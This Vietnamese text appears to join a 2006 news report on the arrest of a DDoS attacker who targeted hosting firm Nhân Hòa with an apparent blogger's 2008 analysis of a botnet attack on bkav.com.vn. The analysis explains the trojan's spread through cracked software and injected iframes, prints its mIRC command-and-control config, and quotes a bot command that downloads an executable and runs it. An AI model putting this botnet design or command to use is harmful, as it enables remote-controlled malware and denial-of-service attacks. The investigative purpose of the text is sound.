C15 bắt giữ một đối tượng tấn công DDoS

(VietNamNet) - Đơn vị Phòng chống tội phạm công nghệ cao C15 - Bộ công an vừa tiến hành bắt giữ một số đối tượng liên quan đến tội phạm công nghệ cao: tấn công từ chối dịch vụ (DDoS) có chủ đích vào hệ thống máy chủ của công ty Nhân Hòa (Hà Nội).
Tấn công DDOS bằng xflash có sức phá hoại không thể chống đỡ!


Ông Trần Văn Hòa - trưởng đơn vị Phòng chống tội phạm công nghệ cao C15 (Bộ Công an) khẳng định, trong buổi sáng hôm nay - 31/7/2006 - C15 đã tiến hành bắt giữ một đối tượng ở Bắc Ninh, sau khi có bằng chứng xác đáng về việc người này cùng một số đối tượng khác liên tục tấn công từ chối dịch vụ (DDoS) với ý đồ xấu vào hệ thống máy chủ của công ty Nhân Hòa - (Công ty cung cấp dịch vụ Hosting và Domain có trụ sở tại Hà Nội).
Vụ việc nói trên đã được C15 âm thầm tiến hành điều tra hơn một tháng nay. Cho đến hiện tại, dù đã có những bằng chứng xác đáng, C15 vẫn chưa công bố tên tuổi và các hình thức xử lý với đối tượng bị bắt, song họ khẳng định sẽ đưa ra các thông tin sau khi hoàn tất các thủ tục cần thiết.
Ông Vũ Đức Trung - (giám đốc công ty Nhân Hòa - người viết lá đơn nhờ C15 vào cuộc điều tra) cho biết: Cách đây khoảng 4 tháng, các máy chủ của công ty ông bị tấn công từ chối dịch vụ liên tiếp một cách đáng ngờ.
"Việc tấn công DDoS dữ dội vào các website ngẫu nhiên của khách hàng đặt trên server (máy chủ) của chúng tôi khiến toàn bộ hệ thống bị quá tải và làm chúng tôi ngày càng mất dần khách hàng. Việc này ảnh hưởng nghiêm trọng đến số lượng khách hàng, chất lượng phục vụ và uy tín của công ty" - Ông Trung nói.
Khi bị tấn công từ chối dịch vụ phân tán, các dữ liệu ảo sẽ được gửi liên tục từ khắp nơi trên mạng tới hệ thống máy tính nạn nhân, khiến website không thể hoạt động vì quá tải.

Sau khi theo dõi và "chịu đựng" một thời gian dài, ông Trung cho rằng công ty của mình đang bị tấn công một cách có chủ đích: "Rất có thể là một sự cạnh tranh không lành mạnh từ một công ty kinh doanh dịch vụ tương tự". Từ đó ông Trung bắt đầu theo dõi - ghi lại các diễn biến của từng đợt tấn công và gửi file log sang trung tâm An ninh mạng BKIS - ĐH Bách Khoa HN nhờ đơn vị này giúp đỡ.
"Trong quyền hạn của mình, BKIS chỉ có thể tìm ra các đầu mối, các thông tin liên quan có giá trị, sau đó chúng tôi khuyên Nhân Hòa hãy nộp đơn cho C15 - Đơn vị này mới có đủ thẩm quyền điều tra." - Ông Nguyễn Tử Quảng - giám đốc trung tâm BKIS cho biết.
Với sự vào cuộc đầy quyết tâm của C15 cùng với sự phối hợp của BKIS, vụ việc đã được đưa ra ánh sáng. Theo ông Quảng, ở Việt Nam hiện tại có hai hình thức tấn công từ chối dịch vụ khiến nhiều người đau đầu: Sử dụng mạng Botnet và tấn công Xflash.
Trước đây C15 cũng từng xử lý một vụ việc điển hình, bắt giữ đối tượng Nguyễn Thành Công (DantruongX) vì đã tấn công từ chối dịch vụ gây thiệt hại vào hệ thống website TMĐT của công ty VietCo. Khi đó DantruongX sử dụng mạng Botnet để tấn công, còn hình thái mà nhóm DDoSer lần này sử dụng tấn công Nhân Hòa là XFlash.
Thực ra thì cả hai hình thái DDoS này đều rất ác ý và có sức hủy diệt lớn đối với các hệ thống thông tin. "Không chỉ VietCo và Nhân Hòa, theo tôi được biết thì hầu hết các hệ thống thông tin và thương mại điện tử ở Việt Nam đều đang bị DDoS quấy rối. Những động thái xử lý răn đe của pháp luật vào lúc này theo tôi là rất cần thiết!" - Ông Quảng kết luận.

VietNamNet sẽ cập nhật các thông tin thêm về vụ việc này đến bạn đọc.

* Thế Phong

Kẻ tấn công vừa bị bắt theo thông tin trên báo là một học sinh trung học ở Quảng Nam. Vậy làm sao một học sinh trung học có thể huy động nhiều máy tính để tấn công được BKAV.com.vn, chúng ta sẽ cùng nhau phân tích:

Nhận thông tin:
Vào ngày chủ nhật 5/10/2008 khi đang ở nhà, tôi truy cập vào trang bkav.com.vn để down phần mềm diệt virus về diệt virus cho máy laptop người thân, tuy nhiên tôi không thể nào truy cập vào trang bkav.com.vn. Một lát sau tôi liên tục nhận được thông tin website http://www.bkav.com.vn bị tấn công botnet, đến chiều hôm đó tôi đăng tin lên trang http://vietnamsecurity.googlepages.com, ngày hôm sau các báo bắt đầu đăng tin và phỏng vấn BKIS về vụ việc tuy nhiên bkis đã phủ nhận tất cả thông tin và đính chính là vụ việc trên chỉ là hoạt động nâng cấp thường nhật của BKAV.

Sau đây là những hình ảnh chụp được ngày 5/10:

Tuy nhiên, tôi vẫn tiếp tục nhận được thông tin bkav bị ddos, website bkav.com.vn tiếp tục hoạt động chập chờn và thậm chí có lúc không truy cập vào được trong thời gian dài! đến lúc này thì thông báo việc nâng cấp của bkav không còn hợp lý nữa, nó củng cố thêm thông tin cho là bkav.com.vn bị tấn công botnet. Sau đây là những hình ảnh cập nhật sau đó:

Đồng thời vào 17h ngày 7/10 tôi lại nhận được những hình ảnh chụp màn hình được cho là hình ảnh tấn công trang bkav.com.vn và một file có tên là BKAV.exe ( được cho là file tấn công bkav.exe)


Đồng thời trên mạng cũng xuất hiện các thông tin cho rằng có một người đã dùng các chèn mã độc vào các bản crack BKAV pro, các bản auto game và chèn iframe vào các website lớn để từ đó xây dựng mạng botnet để tấn công http://www.bkav.com.vn

Tìm thông tin

Sau khi nhận thông tin và phản hồi từ các báo chí và bạn bè, tôi tiến hành điều tra sự việc!

Tôi tìm bắt tìm thông tin về các hacker hay sử dụng botnet, các loại botnet phổ biến ở Việt Nam, tìm các các diễn đàn lớn đã bị tấn công trong thời gian qua để tìm manh mối! đồng thời nhờ người có kinh nghiệm tiến hành thử nghiệm và phân tích cơ chế hoạt động của của file BKAV.exe.

Kết quả là tôi cũng tìm được một số manh mối:

Sau khi phân tích file BKAV.exe cho thấy đây là một loại virus nội, đã được đưa vào danh sách virus của BKAV, thông tin thêm:

http://bkav.com.vn/thong_tin_virus/13/08/2008/3/1755/
đồng thời tìm kiếm trên các forum lớn, tôi tìm được các thông tin sau:
đây là đoạn mã chèn file vào website, cụ thể ở đây là 4gamevn.com, cơ chế của nó là tự download file trojan.exe về máy người dùng và thực thi. Thông tin này càng lý giải cho việc làm sao một học sinh trung học có thể xây dựng một mạng lưới bot net với tầm hơn 100 ngàn victim!

Sau khi download file trojan.exe về, tôi tíên hành dịch ngược và may mắn có được email của người viết con trojan này! Tuy nhiên vẫn chưa có được chứng cứ cụ thể về vụ việc tấn công BKAV. Từ địa chỉ email đó tôi bắt đầu tìm được những thông tin cá nhân của kẻ tấn công, hình ảnh, các forum người này tham gia! nó có email là: Linh_XXX@yahoo.com , từ đó tôi vào blog, đồng thời cũng biết được níck trên mạng của kẻ đó là LLY. . ., một tay chơi botnet còn khá nhỏ tuổi ở Việt Nam, tôi bắt đầu tìm hiểu cách xây dựng mạng Botnet của Lly. . .

Câu chuyện hé mở:

Qua tìm hiểu cho thấy kẻ tấn công còn trẻ tuy nhiên có sự nghiên cứu về botnet, cc chùa, và biết lập trình!

Lly… đã viết cho mình một chương trình botnet mới dựa trên nền tảng mIRC để điều khiển các victim. Sau đó lly… đã cài con virus này vào các chương trình chơi auto game, chương trình crack Bkpro (chưa tìm ra phiên bản để kiểm chứng), đồng thời dựa vào các mối quan hệ với các tay chơi botnet khác kiếm shell trên các diễn đàn lớn, đông lựơt truy cập để cài iframe vào các diễn đàn đó, thậm chí có thể lly đã cài vào chính diễn đàn về âm nhạc và giải trí mà lly đang quản lý!

Sau khi victim bị nhiễm vào máy sẽ thự động nhận lệnh từ một file có trên website của kẻ tấn công: http://www.xxx.net/server/php nội dung của file này có dạng như sau:

[Server] server=irc. port=6667 chan=#zz ver=3 IP=58.xxx.xxx.xxx

với các thông số:

Server: đây là server irc để victim connect vào! vậy tại sao ở đây chỉ là irc? Đó chính là vì kẻ tấn công muốn bình thường victim không thể connect tới server được, khi nào kẻ tấn công chỉnh lại file server.php thì victim mới connect vào!

Port:6667 là port mặt định của IRC

Chan: đây là room mà kẻ tấn công sẽ tạo ra để điều khiển các victim

Ver=3: là version của virus botnet này, có nó chức năng tự động cập nhật khi phiên bản trong máy victim cũ!

IP=58.xxx.xxx.xxx: đây là ip của kẻ tấn công

Sau khi nhận lệnh từ file server.php, máy của vitim sẽ tự động connect tới server IRC.nhac…..vn và join vào room ZZ

Kẻ tấn công đã khéo léo viết chương trình botnet nhận lệnh từ mIRC

Cấu trúc câu lệnh như sau:

!lly… download http://www.xxx.vn/bkav.exe c:\a.exe 1

Ý nghĩa của nó là sẽ tự động download file bkav.exe từ server về máy victim và tự động thực thi! File bkav.exe có nhiệm vụ là ghi vào regstry những biến để liên tục ping đến server bkav.exe gây ra cuộc tấn công từ chối dịch vụ!

vậy khi cần thực hiện cuộc tấn công, lly.. chỉ cần connect vào mạng mIRC và gõ vài câu lệnh!
Từ hackerbinhphuoc.